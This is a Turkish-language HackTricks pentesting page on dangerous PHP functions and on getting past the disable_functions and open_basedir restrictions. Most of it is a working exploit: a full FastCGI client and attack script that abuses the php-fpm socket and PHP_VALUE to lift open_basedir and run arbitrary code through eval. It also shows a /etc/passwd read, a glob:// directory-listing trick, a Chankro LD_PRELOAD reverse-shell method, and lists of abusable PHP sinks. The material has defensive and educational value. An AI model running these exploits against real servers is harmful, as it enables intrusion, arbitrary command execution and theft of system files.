Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız veya HackTricks'i PDF olarak indirmek istiyorsanız [ABONELİK PLANLARI]'na göz atın (https://github.com/sponsors/carlospolop)!
Not:p0wny-shell adlı php webshell, aşağıdaki fonksiyonları otomatik olarak kontrol edebilir ve atlayabilir, eğer bunlardan bazıları devre dışı bırakılmışsa.
exec - Komutların çıktısının son satırını döndürür
echoexec("uname -a");
passthru - Komut çıktısını doğrudan tarayıcıya iletiyor
echopassthru("uname -a");
sistem - Komutların çıktısını doğrudan tarayıcıya ileterek son satırı döndürür
echosystem("uname -a");
shell_exec - Komutların çıktısını döndürür
echoshell_exec("uname -a");
`` (backticks) - shell_exec() ile aynı işlevi görür
echo`uname-a`
popen - Bir komutun işlemine okuma veya yazma boru hattı açar
echofread(popen("/bin/ls /","r"),4096);
proc_open - popen() ile benzer ancak daha fazla kontrol derecesine sahiptir
pcntl_exec - Bir programı çalıştırır (varsayılan olarak modern ve pek de modern olmayan PHP'de bu işlevi kullanabilmek için pcntl.so modülünü yüklemeniz gerekir)
mail / mb_send_mail - Bu işlev e-posta göndermek için kullanılır, ancak $options parametresi içine keyfi komutlar enjekte etmek için de kötüye kullanılabilir. Bu, çünkü php mail işlevi genellikle sistem içinde sendmail ikili dosyasını çağırır ve size ekstra seçenekler eklemenize izin verir. Ancak, yürütülen komutun çıktısını göremezsiniz, bu yüzden çıktıyı bir dosyaya yazan bir kabuk betiği oluşturmanız, bunu kullanarak mail ile çalıştırmanız ve çıktıyı yazdırmanız önerilir:
dl - Bu işlev, bir PHP uzantısını dinamik olarak yüklemek için kullanılabilir. Bu işlev her zaman mevcut olmayabilir, bu yüzden bunu sömürmeye çalışmadan önce mevcut olup olmadığını kontrol etmelisiniz. Bu işlevi nasıl sömüreceğinizi öğrenmek için bu sayfayı okuyun.
PHP Kodu Yürütme
Eval dışında PHP kodunu yürütmek için başka yollar da vardır: include/require, Yerel Dosya Dahil Etme ve Uzak Dosya Dahil Etme zafiyetleri şeklinde uzaktan kod yürütme için kullanılabilir.
${<php code>} // If your input gets reflected in any PHP string, it will be executed.eval()assert()// identical to eval()preg_replace('/.*/e',...)// e does an eval() on the matchcreate_function()// Create a function and use eval()include()include_once()require()require_once()$_GET['func_name']($_GET['argument']);$func =newReflectionFunction($_GET['func_name']);$func->invoke();// or$func->invokeArgs(array());// or serialize/unserialize function
disable_functions & open_basedir
Devre dışı bırakılan fonksiyonlar, PHP'de .ini dosyalarında yapılandırılabilen ve belirtilen fonksiyonların kullanımını yasaklayan ayarlamadır. Open basedir, PHP'ye erişebileceği klasörü belirten bir ayarlamadır.
PHP ayarı genellikle /etc/php7/conf.d veya benzeri bir yol üzerinde yapılandırılır.
Her iki yapılandırma da phpinfo() çıktısında görülebilir:
open_basedir Atlatma
open_basedir, PHP'nin erişebileceği klasörleri yapılandırır, bu klasörlerin dışındaki herhangi bir dosyayı yazma/okuma/çalıştırma yapamazsınız, ayrıca diğer dizinleri listeleyemezsiniz.
Ancak, herhangi bir şekilde keyfi PHP kodunu çalıştırabilirseniz, kısıtlamayı atlamak için aşağıdaki kod parçacıklarını deneyebilirsiniz.
glob:// atlatma ile dizinleri listeleme
Bu ilk örnekte, glob:// protokolü ile bazı yol atlatmaları kullanılmıştır:
<?php$file_list =array();$it =newDirectoryIterator("glob:///v??/run/*");foreach($it as $f) {$file_list[] = $f->__toString();}$it =newDirectoryIterator("glob:///v??/run/.*");foreach($it as $f) {$file_list[] = $f->__toString();}sort($file_list);foreach($file_list as $f){echo"{$f}<br/>";}
Not1: Yolda /etc/* ve diğer klasörleri listelemek için /e??/* kullanabilirsiniz.
Not2: Kodun bir kısmının tekrarlandığı görünüyor, ancak aslında bu gerekli!
Not3: Bu örnek yalnızca klasörleri listelemek için kullanışlıdır, dosyaları okumak için değil
Tam open_basedir atlatma FastCGI'yi suiistimal ederek
Eğer PHP-FPM ve FastCGI hakkında daha fazla bilgi edinmek istiyorsanızbu sayfanın ilk bölümünü okuyabilirsiniz.
Eğer php-fpm yapılandırılmışsa, open_basedir'yi tamamen atlamak için onu suiistimal edebilirsiniz:
İlk yapmanız gereken şeyin php-fpm'nin unix soketinin nerede olduğunu bulmak olduğuna dikkat edin. Genellikle /var/run altında olur, bu yüzden dizini listelemek ve bulmak için önceki kodu kullanabilirsiniz.
Kod buradan alınmıştır.
<?php/*** Note : Code is released under the GNU LGPL** Please do not change the header of this file** This library is free software; you can redistribute it and/or modify it under the terms of the GNU* Lesser General Public License as published by the Free Software Foundation; either version 2 of* the License, or (at your option) any later version.** This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;* without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.** See the GNU Lesser General Public License for more details.*//*** Handles communication with a FastCGI application** @author Pierrick Charron <pierrick@webstart.fr>* @version 1.0*/classFCGIClient{const VERSION_1 =1;const BEGIN_REQUEST =1;const ABORT_REQUEST =2;const END_REQUEST =3;const PARAMS =4;const STDIN =5;const STDOUT =6;const STDERR =7;const DATA =8;const GET_VALUES =9;const GET_VALUES_RESULT =10;const UNKNOWN_TYPE =11;const MAXTYPE =self::UNKNOWN_TYPE;const RESPONDER =1;const AUTHORIZER =2;const FILTER =3;const REQUEST_COMPLETE =0;const CANT_MPX_CONN =1;const OVERLOADED =2;const UNKNOWN_ROLE =3;const MAX_CONNS ='MAX_CONNS';const MAX_REQS ='MAX_REQS';const MPXS_CONNS ='MPXS_CONNS';const HEADER_LEN =8;/*** Socket* @varResource*/private $_sock =null;/*** Host* @varString*/private $_host =null;/*** Port* @varInteger*/private $_port =null;/*** Keep Alive* @varBoolean*/private $_keepAlive =false;/*** Constructor** @paramString $host Host of the FastCGI application* @paramInteger $port Port of the FastCGI application*/publicfunction__construct($host, $port =9000) // and default value for port, just for unixdomain socket{$this->_host = $host;$this->_port = $port;}/*** Define whether or not the FastCGI application should keep the connection* alive at the end of a request** @paramBoolean $b true if the connection should stay alive, false otherwise*/publicfunctionsetKeepAlive($b){$this->_keepAlive = (boolean)$b;if (!$this->_keepAlive &&$this->_sock) {fclose($this->_sock);}}/*** Get the keep alive status** @returnBoolean true if the connection should stay alive, false otherwise*/publicfunctiongetKeepAlive(){return$this->_keepAlive;}/*** Create a connection to the FastCGI application*/privatefunctionconnect(){if (!$this->_sock) {//$this->_sock = fsockopen($this->_host, $this->_port, $errno, $errstr, 5);$this->_sock =stream_socket_client($this->_host, $errno, $errstr,5);if (!$this->_sock) {thrownewException('Unable to connect to FastCGI application');}}}/*** Build a FastCGI packet** @paramInteger $type Type of the packet* @paramString $content Content of the packet* @paramInteger $requestId RequestId*/privatefunctionbuildPacket($type, $content, $requestId =1){$clen =strlen($content);returnchr(self::VERSION_1)/* version */.chr($type)/* type */.chr(($requestId >>8) &0xFF)/* requestIdB1 */.chr($requestId &0xFF)/* requestIdB0 */.chr(($clen >>8 ) &0xFF)/* contentLengthB1 */.chr($clen &0xFF)/* contentLengthB0 */.chr(0)/* paddingLength */.chr(0)/* reserved */. $content; /* content */}/*** Build an FastCGI Name value pair** @paramString $name Name* @paramString $value Value* @returnString FastCGI Name value pair*/privatefunctionbuildNvpair($name, $value){$nlen =strlen($name);$vlen =strlen($value);if ($nlen <128) {/* nameLengthB0 */$nvpair =chr($nlen);} else {/* nameLengthB3 & nameLengthB2 & nameLengthB1 & nameLengthB0 */$nvpair =chr(($nlen >>24) |0x80).chr(($nlen >>16) &0xFF).chr(($nlen >>8) &0xFF).chr($nlen &0xFF);}if ($vlen <128) {/* valueLengthB0 */$nvpair .=chr($vlen);} else {/* valueLengthB3 & valueLengthB2 & valueLengthB1 & valueLengthB0 */$nvpair .=chr(($vlen >>24) |0x80).chr(($vlen >>16) &0xFF).chr(($vlen >>8) &0xFF).chr($vlen &0xFF);}/* nameData & valueData */return $nvpair . $name . $value;}/*** Read a set of FastCGI Name value pairs** @paramString $data Data containing the set of FastCGI NVPair* @returnarray of NVPair*/privatefunctionreadNvpair($data, $length =null){$array =array();if ($length ===null) {$length =strlen($data);}$p =0;while ($p != $length) {$nlen =ord($data{$p++});if ($nlen >=128) {$nlen = ($nlen &0x7F<<24);$nlen |= (ord($data{$p++})<<16);$nlen |= (ord($data{$p++})<<8);$nlen |= (ord($data{$p++}));}$vlen =ord($data{$p++});if ($vlen >=128) {$vlen = ($nlen &0x7F<<24);$vlen |= (ord($data{$p++})<<16);$vlen |= (ord($data{$p++})<<8);$vlen |= (ord($data{$p++}));}$array[substr($data, $p, $nlen)] =substr($data, $p+$nlen, $vlen);$p += ($nlen + $vlen);}return $array;}/*** Decode a FastCGI Packet** @paramString $data String containing all the packet* @returnarray*/privatefunctiondecodePacketHeader($data){$ret =array();$ret['version'] =ord($data{0});$ret['type'] =ord($data{1});$ret['requestId'] = (ord($data{2})<<8) +ord($data{3});$ret['contentLength'] = (ord($data{4})<<8) +ord($data{5});$ret['paddingLength'] =ord($data{6});$ret['reserved'] =ord($data{7});return $ret;}/*** Read a FastCGI Packet** @returnarray*/privatefunctionreadPacket(){if ($packet =fread($this->_sock,self::HEADER_LEN)) {$resp =$this->decodePacketHeader($packet);$resp['content'] ='';if ($resp['contentLength']) {$len = $resp['contentLength'];while ($len && $buf=fread($this->_sock, $len)) {$len -=strlen($buf);$resp['content'] .= $buf;}}if ($resp['paddingLength']) {$buf=fread($this->_sock, $resp['paddingLength']);}return $resp;} else {returnfalse;}}/*** Get Informations on the FastCGI application** @paramarray $requestedInfo information to retrieve* @returnarray*/publicfunctiongetValues(array $requestedInfo){$this->connect();$request ='';foreach ($requestedInfo as $info) {$request .=$this->buildNvpair($info,'');}fwrite($this->_sock,$this->buildPacket(self::GET_VALUES, $request,0));$resp =$this->readPacket();if ($resp['type'] ==self::GET_VALUES_RESULT) {return$this->readNvpair($resp['content'], $resp['length']);} else {thrownewException('Unexpected response type, expecting GET_VALUES_RESULT');}}/*** Execute a request to the FastCGI application** @paramarray $params Array of parameters* @paramString $stdin Content```php* @returnString*/publicfunctionrequest(array $params, $stdin){$response ='';$this->connect();$request = $this->buildPacket(self::BEGIN_REQUEST, chr(0) . chr(self::RESPONDER) . chr((int) $this->_keepAlive) . str_repeat(chr(0), 5));
$paramsRequest ='';foreach ($params as $key => $value) {$paramsRequest .=$this->buildNvpair($key, $value);}if ($paramsRequest) {$request .=$this->buildPacket(self::PARAMS, $paramsRequest);}$request .=$this->buildPacket(self::PARAMS,'');if ($stdin) {$request .=$this->buildPacket(self::STDIN, $stdin);}$request .=$this->buildPacket(self::STDIN,'');fwrite($this->_sock, $request);do {$resp =$this->readPacket();if ($resp['type'] ==self::STDOUT || $resp['type'] ==self::STDERR) {$response .= $resp['content'];}} while ($resp && $resp['type'] !=self::END_REQUEST);var_dump($resp);if (!is_array($resp)) {thrownewException('Kötü istek');}switch (ord($resp['content']{4})) {caseself::CANT_MPX_CONN:thrownewException('Bu uygulama çoklu bağlantıyı desteklemiyor [CANT_MPX_CONN]');break;caseself::OVERLOADED:thrownewException('Yeni istek reddedildi; çok meşgul [OVERLOADED]');break;caseself::UNKNOWN_ROLE:thrownewException('Rol değeri bilinmiyor [UNKNOWN_ROLE]');break;caseself::REQUEST_COMPLETE:return $response;}}}?><?php// gerçek saldırı buradan başlıyorif (!isset($_REQUEST['cmd'])) {die("Girişinizi kontrol edin\n");}if (!isset($_REQUEST['filepath'])) {$filepath =__FILE__;}else{$filepath = $_REQUEST['filepath'];}$req ='/'.basename($filepath);$uri = $req .'?'.'command='.$_REQUEST['cmd'];$client =newFCGIClient("unix:///var/run/php-fpm.sock",-1);$code ="<?php eval(\$_REQUEST['command']);?>"; // php payload -- Hiçbir şey yapmaz$php_value ="allow_url_include = On\nopen_basedir = /\nauto_prepend_file = php://input";//$php_value = "allow_url_include = On\nopen_basedir = /\nauto_prepend_file = http://127.0.0.1/e.php";$params =array('GATEWAY_INTERFACE'=>'FastCGI/1.0','REQUEST_METHOD'=>'POST','SCRIPT_FILENAME'=> $filepath,'SCRIPT_NAME'=> $req,'QUERY_STRING'=>'command='.$_REQUEST['cmd'],'REQUEST_URI'=> $uri,'DOCUMENT_URI'=> $req,#'DOCUMENT_ROOT' => '/','PHP_VALUE'=> $php_value,'SERVER_SOFTWARE'=>'80sec/wofeiwo','REMOTE_ADDR'=>'127.0.0.1','REMOTE_PORT'=>'9985','SERVER_ADDR'=>'127.0.0.1','SERVER_PORT'=>'80','SERVER_NAME'=>'localhost','SERVER_PROTOCOL'=>'HTTP/1.1','CONTENT_LENGTH'=>strlen($code));// print_r($_REQUEST);// print_r($params);//echo "Çağrı: $uri\n\n";echo $client->request($params, $code)."\n";?>
Bu betikler, genellikle /var/run konumunda bulunan php-fpm'nin unix soketiyle iletişim kuracak ve keyfi kodu yürütecektir. Gönderilen PHP_VALUE özniteliği tarafından open_basedir ayarları geçersiz kılınacaktır.
Gönderdiğiniz PHP kodunu yürütmek için eval'in cmd parametresi içinde kullanıldığına dikkat edin.
Ayrıca yorum satırı 324'e dikkat edin, onu açabilir ve payload otomatik olarak verilen URL'ye bağlanacak ve orada bulunan PHP kodunu yürütecektir.
Sadece /etc/passwd dosyasının içeriğini almak için http://vulnerable.com:1337/l.php?cmd=echo file_get_contents('/etc/passwd'); adresine erişin.
Muhtemelen open_basedir yapılandırmasını geçersiz kılabildiğimiz gibi disable_functions'ı da geçersiz kılabiliriz diye düşünebilirsiniz. Deneyin, ancak işe yaramayacak, görünüşe göre disable_functions yalnızca bir .ini php yapılandırma dosyasında yapılandırılabilir ve PHP_VALUE kullanarak yaptığınız değişiklikler bu belirli ayar üzerinde etkili olmayacaktır.
disable_functions Atlatma
Eğer bir makinede PHP kodunun yürütülmesini yönetebiliyorsanız muhtemelen keyfi sistem komutlarını yürütmek istersiniz. Bu durumda, genellikle disable_functions'da devre dışı bırakılmış olan PHP fonksiyonlarının çoğunun veya tümünün sistem komutlarını yürütmeye izin veren fonksiyonlar olduğunu keşfetmek olağandır.
Bu kısıtlamayı nasıl atlayabileceğinizi görelim (eğer atlayabilirseniz)
Bu sayfanın başına geri dönün ve komut yürütme fonksiyonlarından herhangi birinin devre dışı bırakılmadığını ve ortamda mevcut olduğunu kontrol edin. Bir tanesini bulursanız, keyfi sistem komutlarını yürütmek için kullanabilirsiniz.
LD_PRELOAD atlatması
mail() gibi bazı PHP fonksiyonlarının sistem içinde ikili dosyaları yürüteceği iyi bilinmektedir. Bu nedenle, bunları herhangi bir şeyi yürütebilecek bir kütüphane yüklemeleri için LD_PRELOAD ortam değişkenini kullanarak kötüye kullanabilirsiniz.
LD_PRELOAD ile disable_functions'ı atlamak için kullanılabilecek fonksiyonlar
Bu yanlış yapılandırmadan yararlanmak için Chankro kullanabilirsiniz. Bu, yüklemeniz gereken bir PHP açığı oluşturacak bir araçtır ve bu açığı kötüye kullanmak için zayıf sunucuya yüklemeniz ve çalıştırmanız gerekmektedir (web üzerinden erişin).
Chankro, kurbanın diskinin içine yazacak olan kütüphane ve ters kabuk'u belirleyeceğiniz ve ters kabuğu çalıştırmak için **LD_PRELOAD hilesi + PHP mail()** fonksiyonunu kullanacak olan bir araçtır.
Chankro'yu kullanabilmek için, mail ve putenv'in disable_functions listesinin içinde bulunmaması gerektiğini unutmayın.
Aşağıdaki örnekte, arch 64 için chankro açığı oluşturmayı görebilirsiniz, bu açık whoami'yi çalıştıracak ve çıktıyı /tmp/chankro_shell.out içinde kaydedecek, chankro kütüphaneyi ve yükü/tmp içine yazacak ve son açıkbicho.php olarak adlandırılacaktır (bu, kurban sunucuya yüklemeniz gereken dosyadır):
#!/bin/shwhoami >/tmp/chankro_shell.out
Bu PHP işlevleri, disable_functions ve open_basedir bypass gibi güvenlik önlemlerini atlamak için kullanışlıdır. disable_functions, belirli işlevleri devre dışı bırakmak için kullanılırken, open_basedir, dosya işlemlerinin sınırlarını belirler. Bu işlevlerin kullanımı, güvenlik açıklarını tespit etmek ve sistemlerinizi güçlendirmek için önemlidir.
PHP kullanarak dosyaları okuyabilir ve yazabilir, dizinler oluşturabilir ve izinleri değiştirebilirsiniz.
Hatta veritabanlarını dökümleyebilirsiniz.
Belki PHP kullanarak makineyi numaralandırarak ayrıcalıkları yükseltme/komutları yürütme yolu bulabilirsiniz (örneğin bazı özel ssh anahtarlarını okuyarak).
Bu fonksiyonlar, saldırganın seçtiği bir fonksiyonu çağırmak için kullanılabilecek bir dize parametresini kabul eder. Saldırganın bir parametre geçme yeteneğine sahip olup olmadığı fonksiyona bağlı olarak değişebilir. Bu durumda phpinfo() gibi bir Bilgi Sızdırma fonksiyonu kullanılabilir.
// Function => Position of callback arguments'ob_start'=>0,'array_diff_uassoc'=>-1,'array_diff_ukey'=>-1,'array_filter'=>1,'array_intersect_uassoc'=>-1,'array_intersect_ukey'=>-1,'array_map'=>0,'array_reduce'=>1,'array_udiff_assoc'=>-1,'array_udiff_uassoc'=>array(-1,-2),'array_udiff'=>-1,'array_uintersect_assoc'=>-1,'array_uintersect_uassoc'=>array(-1,-2),'array_uintersect'=>-1,'array_walk_recursive'=>1,'array_walk'=>1,'assert_options'=>1,'uasort'=>1,'uksort'=>1,'usort'=>1,'preg_replace_callback'=>1,'spl_autoload_register'=>0,'iterator_apply'=>1,'call_user_func'=>0,'call_user_func_array'=>0,'register_shutdown_function'=>0,'register_tick_function'=>0,'set_error_handler'=>0,'set_exception_handler'=>0,'session_set_save_handler'=>array(0,1,2,3,4,5),'sqlite_create_aggregate'=>array(2,3),'sqlite_create_function'=>2,
Bilgi Sızdırma
Bu işlev çağrılarının çoğu sızıntılar değildir. Ancak, dönen verilerden herhangi biri bir saldırgan tarafından görüntülenebilirse bir zafiyet olabilir. Bir saldırgan phpinfo() görebiliyorsa, bu kesinlikle bir zafiyettir.
extract // Opens the door for register_globals attacks (see study in scarlet).parse_str // works like extract if only one argument is given.putenvini_setmail // has CRLF injection in the 3rd parameter, opens the door for spam.header // on old systems CRLF injection could be used for xss or other purposes, now it is still a problem if they do a header("location: ..."); and they do not die();. The script keeps executing after a call to header(), and will still print output normally. This is nasty if you are trying to protect an administrative area.
proc_niceproc_terminateproc_closepfsockopenfsockopenapache_child_terminateposix_killposix_mkfifoposix_setpgidposix_setsidposix_setuid
Dosya Sistem Fonksiyonları
RATS'a göre, php'deki tüm dosya sistem fonksiyonları kötü niyetli. Bunlardan bazıları saldırgan için çok kullanışsız görünmeyebilir. Diğerleri düşündüğünüzden daha kullanışlı olabilir. Örneğin, allow_url_fopen=On ise bir url dosya yolu olarak kullanılabilir, bu nedenle copy($_GET['s'], $_GET['d']); çağrısı, bir PHP betiğini sistemin herhangi bir yerine yüklemek için kullanılabilir. Ayrıca, bir site, GET aracılığıyla gönderilen bir isteğe karşı savunmasız ise, tüm bu dosya sistem fonksiyonları, saldırıyı başka bir ana bilgisayara yönlendirmek için sunucunuz aracılığıyla kötüye kullanılabilir.
chgrpchmodchowncopyfile_put_contentslchgrplchownlinkmkdirmove_uploaded_filerenamermdirsymlinktempnamtouchunlinkimagepng // 2nd parameter is a path.imagewbmp // 2nd parameter is a path.image2wbmp // 2nd parameter is a path.imagejpeg // 2nd parameter is a path.imagexbm // 2nd parameter is a path.imagegif // 2nd parameter is a path.imagegd // 2nd parameter is a path.imagegd2 // 2nd parameter is a path.iptcembedftp_getftp_nb_getscandir
